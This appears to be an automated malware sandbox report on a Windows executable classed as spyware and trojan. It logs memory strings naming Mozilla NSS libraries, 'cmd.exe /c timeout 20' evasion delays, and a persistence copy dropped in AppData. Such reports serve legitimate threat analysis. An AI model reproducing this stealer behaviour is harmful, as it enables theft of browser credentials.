              Source: 6CJfScEKhr.exe, 0000000E.00000000.398950494.000000000087F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSngggz.exe. vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.458364916.0000000003E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.443952981.0000000003E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.483837799.0000000002A14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.494709446.00000000047D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.496441738.0000000004844000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.468531219.0000000003E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.473472620.0000000003E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.491672886.0000000003E40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.470337933.0000000003E48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.495171916.00000000047E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.495535221.0000000004800000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.499068688.0000000003B10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.492450786.0000000004794000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.473306469.0000000003E58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.459612640.0000000003E40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.495793950.000000000480C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.493645377.00000000047C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.441739439.0000000003E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000002.528885076.000000006EDC8000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.442753555.0000000003E40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.448743941.0000000003E48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.478411129.0000000003E4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.470419906.0000000003E4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.496147713.0000000004828000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.502845901.0000000003E28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.471412090.0000000003E48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.496294114.000000000482C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.492267505.000000000478C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.467718953.0000000003E40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.492747934.00000000047A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.430697897.0000000003E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.492145996.0000000004788000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.494987521.00000000047DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.496671801.0000000003AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.455052099.0000000003E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.492385843.0000000004790000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.448852988.0000000003E4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.493168297.00000000047B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.496007152.000000000481C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.483758150.0000000003E40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.466919518.0000000003E48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.497457894.0000000003AB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.483088942.0000000003E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.493370701.00000000047C0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.439937420.0000000003E4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000002.527995611.000000006BA9B000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.479365495.0000000003E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.498048842.0000000003AB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.495717285.0000000004808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.491857650.0000000004780000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.460534507.0000000003E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.478501176.0000000003E40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.462331443.0000000003E4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.492875018.00000000047A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.493845210.00000000047C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.495924593.0000000004818000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.461364025.0000000003E48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.434513635.0000000003E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.482231000.0000000003E40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.482231000.0000000003E40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.466873515.0000000003E48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.493075719.00000000047AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.495471714.00000000047F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.498532721.0000000003ABC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.498532721.0000000003ABC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000002.518971560.0000000003EE8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.464187220.0000000003E40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.502531240.0000000003D0C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.485003516.0000000003E40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.494141522.00000000047CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.495398232.00000000047F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.494377340.00000000047D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000002.529568809.000000006FB52000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.495083457.00000000047E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.495638921.0000000004804000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.484887053.0000000002A14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.465897904.0000000003E48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.496387090.0000000004840000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dll^ vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenssdbm3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesoftokn3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.432567018.0000000003E40000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.488986283.0000000004970000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.483008786.0000000002A14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefreebl3.dll0 vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.465074490.0000000003E44000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.439832449.0000000003E48000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.494825630.00000000047D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000002.529174504.000000006F4A1000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.480618660.0000000003E4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exe, 0000000E.00000003.495257742.00000000047EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs 6CJfScEKhr.exe
              Source: 6CJfScEKhr.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Pthmzffh.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: 6CJfScEKhr.exeVirustotal: Detection: 42%
              Source: 6CJfScEKhr.exeReversingLabs: Detection: 41%
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile read: C:\Users\user\Desktop\6CJfScEKhr.exeJump to behavior
              Source: 6CJfScEKhr.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\6CJfScEKhr.exe "C:\Users\user\Desktop\6CJfScEKhr.exe"
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess created: C:\Users\user\Desktop\6CJfScEKhr.exe C:\Users\user\Desktop\6CJfScEKhr.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe "C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe"
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe "C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe"
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeProcess created: C:\Users\user\Desktop\6CJfScEKhr.exe C:\Users\user\Desktop\6CJfScEKhr.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20Jump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Roaming\LrqwbyqJump to behavior
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile created: C:\Users\user\AppData\Local\Temp\F0C19552\Jump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/56@4/3
              Source: C:\Users\user\Desktop\6CJfScEKhr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: 6CJfScEKhr.exe, 0000000E.00000003.501600068.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.487505266.0000000003E40000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.502068733.0000000003CE8000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488200891.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.500201204.0000000003BA0000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.499194104.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000003.488137540.0000000003E78000.00000004.00000800.00020000.00000000.sdmp, 6CJfScEKhr.exe, 0000000E.00000002.519459373.0000000003FB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY 